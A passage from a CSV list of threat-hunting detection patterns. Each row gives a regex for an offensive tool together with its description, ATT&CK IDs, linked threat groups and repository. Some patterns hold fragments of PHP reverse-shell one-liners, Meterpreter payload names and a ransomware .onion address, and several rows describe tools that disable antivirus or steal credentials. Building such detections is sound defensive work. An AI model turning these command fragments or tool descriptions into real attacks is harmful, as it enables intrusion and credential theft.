T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54743" "*PEzor\inject.cpp*",".{0,1000}PEzor\\inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","54744" "*pfsense*reverse_root_shell_csrf/*",".{0,1000}pfsense.{0,1000}reverse_root_shell_csrf\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","54745" "*pfx2john.py*",".{0,1000}pfx2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54746" "*pg3n5bteiatjf6rt7oa4xhzo4sj736rifjmk4gtowxjljuwwdv6mccyd.onion*",".{0,1000}pg3n5bteiatjf6rt7oa4xhzo4sj736rifjmk4gtowxjljuwwdv6mccyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54747" "*PGh0bWw+DQoJPGhlYWQ+DQoJCTx0aXRsZT5JbmMuIFJhbnNvbXdhcmU8*",".{0,1000}PGh0bWw\+DQoJPGhlYWQ\+DQoJCTx0aXRsZT5JbmMuIFJhbnNvbXdhcmU8.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","54749" "*pgkt04/defender-control*",".{0,1000}pgkt04\/defender\-control.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","1","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","54750" "*pgpdisk2john.py*",".{0,1000}pgpdisk2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54751" "*pgpsda2john.py*",".{0,1000}pgpsda2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54752" "*pgpwde2john.py*",".{0,1000}pgpwde2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54753" "*ph4nt0mbyt3/Darkside*",".{0,1000}ph4nt0mbyt3\/Darkside.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","54759" "*ph4ntonn/Stowaway*",".{0,1000}ph4ntonn\/Stowaway.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","1","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","54760" "*Phant0m scm 1*",".{0,1000}Phant0m\sscm\s1.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54761" "*Phant0m scm 2*",".{0,1000}Phant0m\sscm\s2.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54762" "*Phant0m wmi*",".{0,1000}Phant0m\swmi.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54763" "*phant0m.cna*",".{0,1000}phant0m\.cna.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54764" "*Phant0m_cobaltstrike*",".{0,1000}Phant0m_cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z","54765" "*phant0m-exe.*",".{0,1000}phant0m\-exe\..{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54766" "*Phant0m-master.zip*",".{0,1000}Phant0m\-master\.zip.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54767" "*phant0m-rdll*",".{0,1000}phant0m\-rdll.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","54768" "*phantom_thread * shc 
*",".{0,1000}phantom_thread\s.{0,1000}\sshc\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54769" "*PhantomService.csproj*",".{0,1000}PhantomService\.csproj.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","54770" "*PhantomService.exe*",".{0,1000}PhantomService\.exe.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","54771" "*phillips321/adaudit*",".{0,1000}phillips321\/adaudit.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","54772" 
"*phish_test.go*",".{0,1000}phish_test\.go.{0,1000}","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","1","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","54774" "*phish_windows_credentials.rb*",".{0,1000}phish_windows_credentials\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54775" "*Phish-Creds.ps1*",".{0,1000}Phish\-Creds\.ps1.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","54776" "*phishDomain = phishDomain +*",".{0,1000}phishDomain\s\=\sphishDomain\s\+.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#content","N/A","10","","N/A","","","","54777" "*phishing-HTML-linter.*",".{0,1000}phishing\-HTML\-linter\..{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","54778" "*phishlets 
*",".{0,1000}phishlets\s.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","54779" "*phising_attack.py*",".{0,1000}phising_attack\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","54780" "*phkbamefinggmakgklpkljjmgibohnba*",".{0,1000}phkbamefinggmakgklpkljjmgibohnba.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","54781" "*phoneinfoga scan -n *",".{0,1000}phoneinfoga\sscan\s\-n\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54784" "*PhoneInfoga*",".{0,1000}PhoneInfoga.{0,1000}","offensive_tool_keyword","PhoneInfoga","An OSINT framework for phone numbers.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - 
TA0010","N/A","N/A","Reconnaissance","https://github.com/sundowndev/PhoneInfoga","1","0","N/A","N/A","N/A","10","14150","3991","2024-06-30T15:29:37Z","2018-10-25T09:19:47Z","54785" "*photon.py -u * -l 3 -t 100 --wayback*",".{0,1000}photon\.py\s\-u\s.{0,1000}\s\-l\s3\s\-t\s100\s\-\-wayback.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54786" "*Php Backdoor v 1.0 by ^Jerem*",".{0,1000}Php\sBackdoor\sv\s1\.0\sby\s\^Jerem.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","54787" "*php -f *.php -- -o myShell.php*",".{0,1000}php\s\-f\s.{0,1000}\.php\s\-\-\s\-o\smyShell\.php.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/b374k/b374k","1","0","N/A","N/A","N/A","10","2462","747","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z","54788" "*PHP Meterpreter Stageless Reverse TCP*",".{0,1000}PHP\sMeterpreter\sStageless\sReverse\sTCP.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54789" "*php -q -S 0.0.0.0:8111*",".{0,1000}php\s\-q\s\-S\s0\.0\.0\.0\:8111.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","54790" "*php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s*",".{0,1000}php\s\-r\s\'\$s\=socket_create\(AF_INET,SOCK_STREAM,SOL_TCP\)\;socket_bind\(\$s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54791" "*php -r '$sock=fsockopen(*,*);exec(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;exec\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54792" "*php -r '$sock=fsockopen(*,*);passthru(""sh ",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;passthru\(\""sh\s","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54793" "*php -r '$sock=fsockopen(*,*);popen(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;popen\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54794" "*php -r '$sock=fsockopen(*,*);shell_exec(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;shell_exec\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54795" "*php -r '$sock=fsockopen(*,*);system(""sh *",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}\)\;system\(\""sh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54796" "*php -r '$sock=fsockopen(*,*proc_open(""sh"",*",".{0,1000}php\s\-r\s\'\$sock\=fsockopen\(.{0,1000},.{0,1000}proc_open\(\""sh\"",.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54797" "*php -r *fsockopen*exec(*/bin/sh*",".{0,1000}php\s\-r\s.{0,1000}fsockopen.{0,1000}exec\(.{0,1000}\/bin\/sh.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#linux","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","54799" "*php -S 0.0.0.0:9056 &*",".{0,1000}php\s\-S\s0\.0\.0\.0\:9056\s\&.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","54801" "*php/meterpreter_reverse_tcp*",".{0,1000}php\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 
- GCMAN - Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54802" "*php/reverse_php*",".{0,1000}php\/reverse_php.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","54803" "*php_filter_chain_generator --chain *php system*'cmd']*",".{0,1000}php_filter_chain_generator\s\-\-chain\s.{0,1000}php\ssystem.{0,1000}\'cmd\'\].{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","54804" "*php_passthru_reverse_tcp.py*",".{0,1000}php_passthru_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","54805" "*php_popen_reverse_tcp.py*",".{0,1000}php_popen_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. 
enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","54806" "*php_proc_open_reverse_tcp.py*",".{0,1000}php_proc_open_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","54807" "*php_reverse_shell_mini.php*",".{0,1000}php_reverse_shell_mini\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","54808" "*php_reverse_shell_older.php*",".{0,1000}php_reverse_shell_older\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","54809" 
"*php_reverse_shell_older_mini.php*",".{0,1000}php_reverse_shell_older_mini\.php.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","1","N/A","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","54810" "*PHP-Code-injection.*",".{0,1000}PHP\-Code\-injection\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","54811" "*PHP-Code-Injections-Payloads.*",".{0,1000}PHP\-Code\-Injections\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","54812" "*phpggc -l*",".{0,1000}phpggc\s\-l.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 